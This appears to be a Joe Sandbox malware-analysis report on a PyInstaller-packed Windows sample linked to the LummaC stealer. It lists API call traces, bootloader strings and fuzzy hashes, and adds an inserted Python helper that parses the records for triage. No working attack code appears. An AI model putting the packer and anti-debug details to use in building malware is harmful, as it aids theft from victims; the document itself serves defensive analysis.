                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                      • API String ID: 4214558900-2208601799
                                                                                                                      • Opcode ID: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
                                                                                                                      • Instruction ID: 7c67fa0a043817b5edd0f48540477e452df1304ebb6fe0ebe541d920b6d020c0
                                                                                                                      • Opcode Fuzzy Hash: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
                                                                                                                      • Instruction Fuzzy Hash: 7DB1AF76F94B1A215640273D7C529A93B984ED2F377008337FA28E81D1FBD1C68976A3
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00F522E9,00000000,?,?,?,00000400,?,00000000,?), ref: 00F565D3
                                                                                                                        • Part of subcall function 00F56A30: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00F522E9,00000000,?,?,?,00000400,?,00000000,?), ref: 00F565F2
                                                                                                                      Strings
                                                                                                                      • PyInstaller: FormatMessageW failed., xrefs: 00F5660E
                                                                                                                      • FormatMessageW, xrefs: 00F56601
                                                                                                                      • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00F5663F
                                                                                                                      • No error messages generated., xrefs: 00F565FC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharErrorFormatLastMessageMultiWide
                                                                                                                      • String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                                                                                                                      • API String ID: 1653872744-3268588819
                                                                                                                      • Opcode ID: 42593e158f0bc9da27985fb996c9089100ffdbc07e085c1daaa7614a98c21f87
                                                                                                                      • Instruction ID: 1f636125cce33de7bb2841f722e93ae9be730101c59c41b42e1ff931251e752b
                                                                                                                      • Opcode Fuzzy Hash: 42593e158f0bc9da27985fb996c9089100ffdbc07e085c1daaa7614a98c21f87
                                                                                                                      • Instruction Fuzzy Hash: 110188747443446BF61C97149C47BAA32D69F98B46F80841DBB0DCA1C2FAE49908E757
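                                                                                                                      The two records above (the GetProcAddress loop that resolves the Tcl_*/Tk_* exports, and the FormatMessageW error path with the "PyInstaller:" strings) carry PyInstaller bootloader strings rather than anything stealer-specific, so when triaging a report of this shape it helps to pull the per-function records into a structured form and flag the bootloader functions so that attention goes to the remaining ones. The Python below is an added example, not Joe Sandbox tooling: the record layout it parses is inferred from this page only, the PyInstaller marker prefixes are a heuristic taken from the strings visible here, and the two first-argument decodes (0x17 = PF_FASTFAIL_AVAILABLE, 0xFDE9 = CP_UTF8) are standard Win32 constants.

```python
# Parser for the per-function "APIs" / "Similarity" records of a Joe Sandbox
# report as rendered above. Added example; record layout inferred from this page.
import re
from dataclasses import dataclass, field
from typing import Optional

# One API call line, e.g.
#   • GetProcAddress.KERNEL32(00F531FD,Tcl_Init), ref: 00F55282
#   • IsDebuggerPresent.KERNEL32 ref: 00F59FB9
#   • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(...), ref: 00F63B8D
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)

# Win32 constants behind first arguments seen in this report.
FIRST_ARG_NAMES = {
    ("IsProcessorFeaturePresent", 0x17): "PF_FASTFAIL_AVAILABLE",
    ("WideCharToMultiByte", 0xFDE9): "CP_UTF8",
}
# Heuristic markers for the PyInstaller bootloader, taken from the strings
# visible in this report (not a formal signature).
PYI_STRING_PREFIXES = ("PyInstaller:", "Failed to get address for Tcl_",
                       "Failed to get address for Tk_")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # int for 8-digit hex, None for '?', str otherwise
    ref: int              # address of the call site
    subcall_of: Optional[int] = None


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    strings: list = field(default_factory=list)
    fuzzy_hash: str = ""


def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if HEX_RE.match(tok) else tok


def parse_report(text):
    """Split the text into FunctionRecords, one per 'APIs' heading."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
            continue
        f = FIELD_RE.match(line)
        if f:
            val = f["val"].strip()
            if f["key"] == "API ID":
                cur.api_id = val
            elif f["key"] == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            else:
                cur.fuzzy_hash = val
    return records


def describe_call(c):
    """'Name.MODULE@ref', with a decoded first argument where one is known."""
    tag = FIRST_ARG_NAMES.get((c.name, c.args[0] if c.args else None))
    return f"{c.name}.{c.module}@{c.ref:08X}" + (f" [{tag}]" if tag else "")


def pyinstaller_markers(rec):
    """Strings and GetProcAddress targets that tie a record to the bootloader."""
    hits = [s for s in rec.strings if s.startswith(PYI_STRING_PREFIXES)]
    hits += [a for c in rec.calls if c.name == "GetProcAddress"
             for a in c.args if isinstance(a, str) and a.startswith(("Tcl_", "Tk_"))]
    return hits


# Constructed input: two records copied from the report above, trimmed.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(00F531FD,Tcl_Init), ref: 00F55282
• GetProcAddress.KERNEL32(00F531FD,Tcl_CreateInterp), ref: 00F552AB
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
Similarity
• API ID: AddressProc$ErrorLast
• String ID: Failed to get address for Tcl_Alloc$Tcl_Init$Tk_Init
• Instruction Fuzzy Hash: 7DB1AF76F94B1A215640273D7C529A93B984ED2F377008337FA28E81D1FBD1C68976A3
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F59EED
• IsDebuggerPresent.KERNEL32 ref: 00F59FB9
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• Instruction Fuzzy Hash: AB315A75D0521DDBDB10DF64D9897CCBBF8AF08305F1041AAE50CA7250EB709B88AF45
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.api_id, [describe_call(c) for c in rec.calls], pyinstaller_markers(rec))
```

Records with a non-empty pyinstaller_markers() result can be set aside as bootloader code; the remaining records (heap wrappers, CreateFileW, the CRT fast-fail/IsDebuggerPresent stub, and anything in the injected child) are where the LummaC-specific behaviour should be looked for. The Instruction Fuzzy Hash field is kept so the same records can be matched against other PyInstaller-packed samples.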
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __floor_pentium4
                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                      • Opcode ID: 31bddd25ef988d42195047e260be9a90d60eeb1339fe58c71b416d3390005237
                                                                                                                      • Instruction ID: d0c60955b4020fd4e79d8298c73a818d04f00eff26d98e20405c8752c9d3db2c
                                                                                                                      • Opcode Fuzzy Hash: 31bddd25ef988d42195047e260be9a90d60eeb1339fe58c71b416d3390005237
                                                                                                                      • Instruction Fuzzy Hash: CDD25D72E042288FDB64CF28DD407EAB7B5EB45315F1441EAD88DE7241E778AE819F81
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F59EED
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00F59FB9
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F59FD9
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F59FE3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 254469556-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F63A7F
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F63A89
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F63A96
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
Strings
Similarity
• API ID:
• String ID: F?
• API String ID: 0-1369233217
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F71698,?,?,00000008,?,?,00F71330,00000000), ref: 00F718CA
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F5A19B
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0000A081,00F597F3), ref: 00F5A07A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
APIs
• GetDialogBaseUnits.USER32 ref: 00F51B0B
• MulDiv.KERNEL32(?,00000032,00000004), ref: 00F51B21
• MulDiv.KERNEL32(00000000,0000000E,00000008), ref: 00F51B32
• SystemParametersInfoW.USER32(00000029,000001F8,000001F8,00000000), ref: 00F51B7B
• CreateFontIndirectW.GDI32(?), ref: 00F51B8D
• #380.COMCTL32(00000000,00007F01,00000001,?), ref: 00F51BAD
• CreateWindowExW.USER32(00000000,STATIC,00000000,50000003,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51BE4
• CreateWindowExW.USER32(00000000,STATIC,00000000,50000000,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C17
• CreateWindowExW.USER32(00000200,EDIT,00000000,50300884,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C4D
• CreateWindowExW.USER32(00000000,BUTTON,Close,50000001,80000000,80000000,80000000,80000000,?,00000001,?,00000000), ref: 00F51C83
• SendMessageW.USER32(?,00000080,00000000,?), ref: 00F51C9D
• SendMessageW.USER32(?,00000080,00000001,?), ref: 00F51CAB
• SendMessageW.USER32(?,00000172,00000001,?), ref: 00F51CBC
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CD0
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CE2
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CF4
• SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51D06
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D13
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D22
• GetClientRect.USER32(?,?), ref: 00F51D2C
  • Part of subcall function 00F51E30: GetDC.USER32(?), ref: 00F51E50
  • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,?), ref: 00F51EA0
  • Part of subcall function 00F51E30: DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
  • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
  • Part of subcall function 00F51E30: ReleaseDC.USER32(?,00000000), ref: 00F51ECF
  • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
  • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
Strings
Similarity
• API ID: MessageSend$Window$Create$MoveObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
• String ID: @U=u$BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
• API String ID: 4195728924-25750965
APIs
Similarity
• API ID: _free$___from_strstr_to_strchr
• String ID:
• API String ID: 3409252457-0
                                                                                                                      APIs
                                                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 00F5254A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                                                      • String ID: %s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s$%s%s%s.exe$%s%s%s.pkg$Archive not found: %s$Archive path exceeds PATH_MAX$Error copying %s$Error extracting %s$Error opening archive %s$malloc
                                                                                                                      • API String ID: 601868998-2292630174
                                                                                                                      • Opcode ID: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction ID: 1037d075f602eea2b7624eb9bc4f1bdeb171a943359c180db230c02fa46f2082
                                                                                                                      • Opcode Fuzzy Hash: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction Fuzzy Hash: EDA12CB29043407AD731D6609C82FBB739CAF56312F444A16FE89C6182E735E60DB6A3
                                                                                                                      APIs
                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00F6A9BD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A573
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A585
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A597
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5A9
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5BB
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5CD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5DF
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5F1
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A603
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A615
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A627
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A639
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A64B
                                                                                                                      • _free.LIBCMT ref: 00F6A9B2
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A9D4
                                                                                                                      • _free.LIBCMT ref: 00F6A9E9
                                                                                                                      • _free.LIBCMT ref: 00F6A9F4
                                                                                                                      • _free.LIBCMT ref: 00F6AA16
                                                                                                                      • _free.LIBCMT ref: 00F6AA29
                                                                                                                      • _free.LIBCMT ref: 00F6AA37
                                                                                                                      • _free.LIBCMT ref: 00F6AA42
                                                                                                                      • _free.LIBCMT ref: 00F6AA7A
                                                                                                                      • _free.LIBCMT ref: 00F6AA81
                                                                                                                      • _free.LIBCMT ref: 00F6AA9E
                                                                                                                      • _free.LIBCMT ref: 00F6AAB6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 161543041-0
                                                                                                                      • Opcode ID: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
                                                                                                                      • Instruction ID: e88cd75c6dfd204880a4730d51d68dcdc0daebf378c8f37d7e13b59bb38a45cb
                                                                                                                      • Opcode Fuzzy Hash: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
                                                                                                                      • Instruction Fuzzy Hash: E6313D31A00701DFEB21AA79DD46B6673F9EF40360F25442AE099E7162DF79BD80EB11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
                                                                                                                      • Instruction ID: 5e8c8626dd12c0caeb55a6d46a736fc720485e1b6ae1456b399be6d4d573e1fb
                                                                                                                      • Opcode Fuzzy Hash: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
                                                                                                                      • Instruction Fuzzy Hash: EB219676900108AFCB41EFA4CC82DEE7BB9EF48344F0041A6B6159B572DB75EB44DB80
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00001000,?,?,?,?,?,00F55A66,?,00000000,?,pyi-runtime-tmpdir), ref: 00F55B1D
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00F55B23
                                                                                                                        • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
                                                                                                                        • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
                                                                                                                        • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?), ref: 00F55BBC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Environment$Variable$CurrentExpandPathProcessStringsTemp_free
                                                                                                                      • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                      • API String ID: 2771213846-1116378104
                                                                                                                      • Opcode ID: e7948cbcb1fb161e5b368f9127e37bc7903ade06f7b8869d148dd58859a56d2e
                                                                                                                      • Instruction ID: d16658bbfa68dbafc81acae506a429a1a9cdd191604794c0d045671d2a34e217
                                                                                                                      • Opcode Fuzzy Hash: e7948cbcb1fb161e5b368f9127e37bc7903ade06f7b8869d148dd58859a56d2e
                                                                                                                      • Instruction Fuzzy Hash: 1C41D372A00B04B7E16076B05C4BF6F35989F85F53F440835FF45A7182FAA8AA0C72A7
                                                                                                                      Strings
                                                                                                                      • malloc, xrefs: 00F51341
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F512CF
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F51306
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F513F2
                                                                                                                      • fread, xrefs: 00F513F7
                                                                                                                      • Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00F5133C
                                                                                                                      • fseek, xrefs: 00F5130B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                      • API String ID: 0-3659356012
                                                                                                                      • Opcode ID: 82c815cc3be57cd793d1eb46e07e4510217462924ac646523b198752caf069e2
                                                                                                                      • Instruction ID: df981358432b7b6d3fcdab9b1473859f20f81adb5b91decf0455604aad4387c6
                                                                                                                      • Opcode Fuzzy Hash: 82c815cc3be57cd793d1eb46e07e4510217462924ac646523b198752caf069e2
                                                                                                                      • Instruction Fuzzy Hash: 5A412B72E003116BEB14AF648C91B2B7798FF40766F048565FE049B642E775FA0CB293
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F557E4
                                                                                                                      Strings
                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00F55855
                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00F557F9
                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00F557B3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
